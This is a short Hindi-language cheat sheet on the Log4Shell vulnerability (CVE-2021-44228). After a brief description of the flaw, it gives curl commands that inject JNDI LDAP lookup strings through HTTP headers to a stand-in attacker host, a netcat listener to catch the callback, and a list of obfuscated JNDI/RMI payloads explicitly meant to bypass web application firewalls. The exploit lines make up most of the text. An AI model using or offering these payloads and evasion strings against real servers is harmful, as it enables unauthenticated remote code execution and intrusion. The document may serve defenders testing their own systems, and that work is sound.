
CVE-2021-44228
5 दिसंबर, 2021 को, Apache ने अपनी व्यापक रूप से उपयोग की जाने वाली Log4j लॉगिंग सेवा में एक कमजोरी की पहचान की (जिसे बाद में CVE-2021-44228 के रूप में पहचाना गया)। यह कमजोरी, जिसे Log4shell के नाम से भी जाना जाता है, हमलावरों को प्रभावित सर्वरों का पूर्ण नियंत्रण प्राप्त करने में सक्षम बनाती है, यदि उपयोगकर्ता Java लॉगिंग लाइब्रेरी का उपयोग करने वाले किसी एप्लिकेशन को चला रहा है, तो यह बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन की अनुमति देती है। Log4j डेवऑप्स फ्रेमवर्क, एंटरप्राइज IT सिस्टम, और विक्रेता सॉफ्टवेयर और क्लाउड उत्पादों के व्यापक सेट में भारी रूप से एकीकृत है।
यह जांचने के लिए कि आपका सर्वर Log4j शोषण के प्रति संवेदनशील है या नहीं, दुर्भावनापूर्ण दूरस्थ होस्ट में निम्नलिखित निष्पादित करें:
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
अन्य विविधताएँ जिनमें HTTP-POST अनुरोध शामिल है, का उपयोग कमजोरी की जाँच के लिए किया जा सकता है:
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
वेबएप फायरवॉल को बायपास करने के लिए:
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}